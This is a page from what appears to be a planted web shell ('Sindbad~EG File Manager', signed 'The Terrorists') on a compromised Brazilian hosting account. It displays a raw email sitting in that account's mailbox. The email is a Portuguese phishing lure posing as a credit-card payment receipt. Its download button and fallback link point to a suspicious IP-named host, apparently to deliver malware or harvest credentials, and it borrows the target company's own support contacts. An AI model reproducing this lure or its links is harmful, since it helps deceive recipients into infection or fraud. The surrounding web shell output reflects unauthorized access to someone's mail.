Sindbad~EG File Manager
| Current Path : /home/ssan4778/mail/new/ |
|
|
| Current File : /home/ssan4778/mail/new/1753281808.M957722P24889.host.sdserver117.com.br,S=15668,W=16094 |
Return-Path: <bounces@zboyo.alliance-bois-tricastine.fr>
Delivered-To: ssan4778@host.sdserver117.com.br
Received: from host.sdserver117.com.br
by host.sdserver117.com.br with LMTP
id MBjyOBD1gGg5YQAAXwKr/Q
(envelope-from <bounces@zboyo.alliance-bois-tricastine.fr>)
for <ssan4778@host.sdserver117.com.br>; Wed, 23 Jul 2025 11:43:28 -0300
Return-path: <bounces@zboyo.alliance-bois-tricastine.fr>
Envelope-to: contab@sanhouse.com.br
Delivery-date: Wed, 23 Jul 2025 11:43:28 -0300
Received: from 51.117.205.35.bc.googleusercontent.com ([35.205.117.51]:48840 helo=zboyo.alliance-bois-tricastine.fr)
by host.sdserver117.com.br with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.98.1)
(envelope-from <bounces@zboyo.alliance-bois-tricastine.fr>)
id 1ueaKm-000000001IP-3kKQ
for contab@sanhouse.com.br;
Wed, 23 Jul 2025 11:23:41 -0300
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple;
d=zboyo.alliance-bois-tricastine.fr; s=default; t=1753280308;
bh=85vCZGDomzdojkr3KdS3II5UCLQsk7w/85o5Je9G8oU=;
h=Date:From:Reply-To:To:Subject:List-Unsubscribe:From;
b=Ki2DmgwH3Wo6MCUakUE9JhpJKMlxd2IDenUnkuy/qderkJPJL9Q7He1QV+QNNfUux
RuN5HnxyrnNIz390e72AtMpIQgYn9ff/0deriCxfzfBm5JioB5yPHdynW00FgFNWwb
ctZhLFAG3ls6AxAVR5nFLkLgDSNduTYd/uFdjV/zYF8/JNyJ1uiwv5BZ7nFkpAhK1A
K0VWm1D/mv3XfV9BPRsAjJYjs/cRXgniAnD+ps+zFLWivJD68jF+Z5/hijFavSr2Ec
1KwD+A04WntjzLeOkwDGNETHq1AgIhV4IZbcfakdh3d/FUfq2Vf2UhKV7++YJRnS9B
OT7aBHgZK/KAg==
Received: from zboyo.alliance-bois-tricastine.fr (localhost [127.0.0.1])
by zboyo.alliance-bois-tricastine.fr (Postfix) with ESMTP id 9176C306953
for <contab@sanhouse.com.br>; Wed, 23 Jul 2025 14:18:28 +0000 (UTC)
Date: Wed, 23 Jul 2025 14:18:28 +0000 (UTC)
From: Patricia Marinoni
<patriciamarinoni3785@zboyo.alliance-bois-tricastine.fr>
Reply-To: patriciamarinoni3785@zboyo.alliance-bois-tricastine.fr
To: contab@sanhouse.com.br
Message-ID: <1418851979.4984.1753280308596@zboyo.alliance-bois-tricastine.fr>
Subject: =?UTF-8?Q?Seu_comprovante_-_Transa=C3=A7=C3=A3o_iWeP8FTIpX?=
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
X-Custom-Message-ID: 1f6cf6c4-d6c1-49c1-8a44-8e007e62406c
List-Unsubscribe: <mailto:unsubscribe@zboyo.alliance-bois-tricastine.fr>, <https://zboyo.alliance-bois-tricastine.fr/unsubscribe?email=contab@sanhouse.com.br>
Precedence: bulk
Auto-Submitted: auto-generated
X-Spam-Status: No, score=
X-Spam-Score:
X-Spam-Bar:
X-Ham-Report:
X-Spam-Flag: NO
<!DOCTYPE html>
<html lang=3D"pt-BR">
<head>
<meta charset=3D"UTF-8">
<meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=
=3D1.0">
<title>Comprovante de Pagamento</title>
<style>
* {
margin: 0;
padding: 0;
font-family: Arial, Helvetica, sans-serif;
}
=20
body {
background-color: #f8f9fa;
color: #333333;
line-height: 1.5;
padding: 20px;
}
=20
.receipt-container {
width: 100%;
max-width: 600px;
margin: 0 auto;
background: #ffffff;
}
=20
.receipt-header {
background: #2c3e50;
color: #ffffff;
padding: 20px;
text-align: center;
position: relative;
}
=20
.receipt-header h1 {
font-size: 24px;
font-weight: bold;
margin-bottom: 8px;
}
=20
.receipt-header p {
font-size: 14px;
}
=20
.receipt-badge {
position: absolute;
top: 20px;
right: 20px;
background: #27ae60;
color: #ffffff;
padding: 5px 10px;
font-size: 12px;
font-weight: bold;
}
=20
.receipt-content {
padding: 20px;
}
=20
.transaction-info {
width: 100%;
margin-bottom: 20px;
}
=20
.info-item {
background: #f8f9fa;
padding: 15px;
text-align: center;
border: 1px solid #dee2e6;
}
=20
.info-label {
font-size: 12px;
color: #6c757d;
margin-bottom: 5px;
}
=20
.info-value {
font-size: 16px;
font-weight: bold;
color: #2c3e50;
}
=20
.divider {
height: 1px;
background: #dee2e6;
margin: 20px 0;
}
=20
.download-section {
background: #e8f4fe;
padding: 20px;
text-align: center;
margin: 20px 0;
border: 1px dashed #3498db;
}
=20
.download-text {
font-size: 16px;
margin-bottom: 15px;
color: #2c3e50;
}
=20
.btn-download {
display: inline-block;
background: #3498db;
color: #ffffff;
padding: 12px 30px;
font-size: 16px;
font-weight: bold;
text-decoration: none;
}
=20
.manual-link {
background: #ffffff;
padding: 15px;
margin-top: 15px;
font-size: 14px;
border: 1px solid #dee2e6;
text-align: center;
color: #6c757d;
}
=20
.security-section {
background: #fff9e6;
border: 1px solid #f1c40f;
padding: 15px;
margin: 20px 0;
}
=20
.security-title {
color: #d35400;
font-weight: bold;
font-size: 16px;
margin-bottom: 10px;
}
=20
.security-text {
line-height: 1.6;
color: #7f8c8d;
font-size: 14px;
}
=20
.security-text ul {
padding-left: 20px;
margin-top: 10px;
}
=20
.security-text li {
margin-bottom: 8px;
}
=20
.support-section {
margin-top: 20px;
}
=20
.support-title {
font-size: 18px;
font-weight: bold;
color: #2c3e50;
margin-bottom: 10px;
text-align: center;
}
=20
.contact-item {
padding: 10px;
background: #f8f9fa;
margin-bottom: 10px;
text-align: center;
}
=20
.contact-text {
font-size: 14px;
color: #333333;
}
=20
.receipt-footer {
background: #2c3e50;
color: #ecf0f1;
padding: 20px;
text-align: center;
}
=20
.company-name {
font-size: 18px;
font-weight: bold;
margin-bottom: 10px;
}
=20
.footer-text {
font-size: 12px;
margin-top: 10px;
}
=20
@media (max-width: 600px) {
.receipt-content {
padding: 15px;
}
=20
.receipt-header h1 {
font-size: 20px;
}
=20
.btn-download {
padding: 10px 20px;
font-size: 14px;
}
}
</style>
</head>
<body>
<table class=3D"receipt-container" role=3D"presentation" border=3D"0" c=
ellpadding=3D"0" cellspacing=3D"0" width=3D"100%" style=3D"max-width: 600px=
; margin: 0 auto; background: #ffffff;">
<tr>
<td class=3D"receipt-header" style=3D"background: #2c3e50; colo=
r: #ffffff; padding: 20px; text-align: center; position: relative;">
<span class=3D"receipt-badge" style=3D"position: absolute; =
top: 20px; right: 20px; background: #27ae60; color: #ffffff; padding: 5px 1=
0px; font-size: 12px; font-weight: bold;">CONFIRMADO</span>
<h1 style=3D"font-size: 24px; font-weight: bold; margin-bot=
tom: 8px;">Comprovante de Pagamento</h1>
<p style=3D"font-size: 14px;">Transa=C3=A7=C3=A3o processad=
a com sucesso</p>
</td>
</tr>
<tr>
<td class=3D"receipt-content" style=3D"padding: 20px;">
<table class=3D"transaction-info" role=3D"presentation" bor=
der=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" style=3D"margi=
n-bottom: 20px;">
<tr>
<td class=3D"info-item" style=3D"background: #f8f9f=
a; padding: 15px; text-align: center; border: 1px solid #dee2e6; width: 50%=
;">
<div class=3D"info-label" style=3D"font-size: 1=
2px; color: #6c757d; margin-bottom: 5px;">N=C3=BAmero da Transa=C3=A7=C3=A3=
o</div>
<div class=3D"info-value" style=3D"font-size: 1=
6px; font-weight: bold; color: #2c3e50;">TRX-n1qXSSgC4b</div>
</td>
<td class=3D"info-item" style=3D"background: #f8f9f=
a; padding: 15px; text-align: center; border: 1px solid #dee2e6; width: 50%=
;">
<div class=3D"info-label" style=3D"font-size: 1=
2px; color: #6c757d; margin-bottom: 5px;">Data e Hora</div>
<div class=3D"info-value" style=3D"font-size: 1=
6px; font-weight: bold; color: #2c3e50;">23/07/2025 =C3=A0s 11:18</div>
</td>
</tr>
<tr>
<td class=3D"info-item" style=3D"background: #f8f9f=
a; padding: 15px; text-align: center; border: 1px solid #dee2e6; width: 50%=
;">
<div class=3D"info-label" style=3D"font-size: 1=
2px; color: #6c757d; margin-bottom: 5px;">Valor</div>
<div class=3D"info-value" style=3D"font-size: 1=
6px; font-weight: bold; color: #2c3e50;">R$ 4.792,61</div>
</td>
<td class=3D"info-item" style=3D"background: #f8f9f=
a; padding: 15px; text-align: center; border: 1px solid #dee2e6; width: 50%=
;">
<div class=3D"info-label" style=3D"font-size: 1=
2px; color: #6c757d; margin-bottom: 5px;">M=C3=A9todo</div>
<div class=3D"info-value" style=3D"font-size: 1=
6px; font-weight: bold; color: #2c3e50;">Cart=C3=A3o de Cr=C3=A9dito</div>
</td>
</tr>
</table>
=20
<div class=3D"divider" style=3D"height: 1px; background: #d=
ee2e6; margin: 20px 0;"></div>
=20
<table class=3D"download-section" role=3D"presentation" bor=
der=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" style=3D"backg=
round: #e8f4fe; padding: 20px; text-align: center; margin: 20px 0; border: =
1px dashed #3498db;">
<tr>
<td>
<div class=3D"download-text" style=3D"font-size=
: 16px; margin-bottom: 15px; color: #2c3e50;">Seu comprovante est=C3=A1 dis=
pon=C3=ADvel para download</div>
<a href=3D"https://54.179.153.160.host.securese=
rver.net/BffD85QCDAXdPVz/JY4b16ptgE/Digitaliza65677219" class=3D"btn-downlo=
ad" style=3D"display: inline-block; background: #3498db; color: #ffffff; pa=
dding: 12px 30px; font-size: 16px; font-weight: bold; text-decoration: none=
;">Baixar Comprovante</a>
<div class=3D"manual-link" style=3D"background:=
#ffffff; padding: 15px; margin-top: 15px; font-size: 14px; border: 1px sol=
id #dee2e6; text-align: center; color: #6c757d;">
Caso o bot=C3=A3o n=C3=A3o funcione, copie =
este link:<br>
<strong>https://54.179.153.160.host.secures=
erver.net/616XlcDAPU9Fm6h/zZRsjZE9Iq/Digitaliza67764492</strong>
</div>
</td>
</tr>
</table>
=20
<table class=3D"security-section" role=3D"presentation" bor=
der=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" style=3D"backg=
round: #fff9e6; border: 1px solid #f1c40f; padding: 15px; margin: 20px 0;">
<tr>
<td>
<div class=3D"security-title" style=3D"color: #=
d35400; font-weight: bold; font-size: 16px; margin-bottom: 10px;">Informa=
=C3=A7=C3=B5es de Seguran=C3=A7a</div>
<div class=3D"security-text" style=3D"line-heig=
ht: 1.6; color: #7f8c8d; font-size: 14px;">
<p>Este documento cont=C3=A9m informa=C3=A7=
=C3=B5es confidenciais:</p>
<ul style=3D"padding-left: 20px; margin-top=
: 10px;">
<li style=3D"margin-bottom: 8px;">Mante=
nha em local seguro</li>
<li style=3D"margin-bottom: 8px;">N=C3=
=A3o compartilhe com terceiros</li>
<li style=3D"margin-bottom: 8px;">V=C3=
=A1lido como comprovante fiscal</li>
<li style=3D"margin-bottom: 8px;">Dispo=
n=C3=ADvel por 30 dias</li>
</ul>
</div>
</td>
</tr>
</table>
=20
<table class=3D"support-section" role=3D"presentation" bord=
er=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" style=3D"margin=
-top: 20px;">
<tr>
<td class=3D"support-title" style=3D"font-size: 18p=
x; font-weight: bold; color: #2c3e50; margin-bottom: 10px; text-align: cent=
er;">Precisa de ajuda?</td>
</tr>
<tr>
<td class=3D"contact-item" style=3D"padding: 10px; =
background: #f8f9fa; margin-bottom: 10px; text-align: center;">
<span class=3D"contact-text" style=3D"font-size=
: 14px; color: #333333;">E-mail: suporte@sanhouse.com.br</span>
</td>
</tr>
<tr>
<td class=3D"contact-item" style=3D"padding: 10px; =
background: #f8f9fa; margin-bottom: 10px; text-align: center;">
<span class=3D"contact-text" style=3D"font-size=
: 14px; color: #333333;">Telefone: (11) 4000-2025</span>
</td>
</tr>
<tr>
<td class=3D"contact-item" style=3D"padding: 10px; =
background: #f8f9fa; margin-bottom: 10px; text-align: center;">
<span class=3D"contact-text" style=3D"font-size=
: 14px; color: #333333;">Site: www.sanhouse.com.br</span>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td class=3D"receipt-footer" style=3D"background: #2c3e50; colo=
r: #ecf0f1; padding: 20px; text-align: center;">
<div class=3D"company-name" style=3D"font-size: 18px; font-=
weight: bold; margin-bottom: 10px;">Sistema de Pagamentos Seguros</div>
<p>Solu=C3=A7=C3=B5es financeiras digitais confi=C3=A1veis<=
/p>
<p class=3D"footer-text" style=3D"font-size: 12px; margin-t=
op: 10px;">Este =C3=A9 um e-mail autom=C3=A1tico - N=C3=A3o responda<br>
=C2=A9 2025 Todos os direitos reservados</p>
</td>
</tr>
</table>
</body>
</html>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists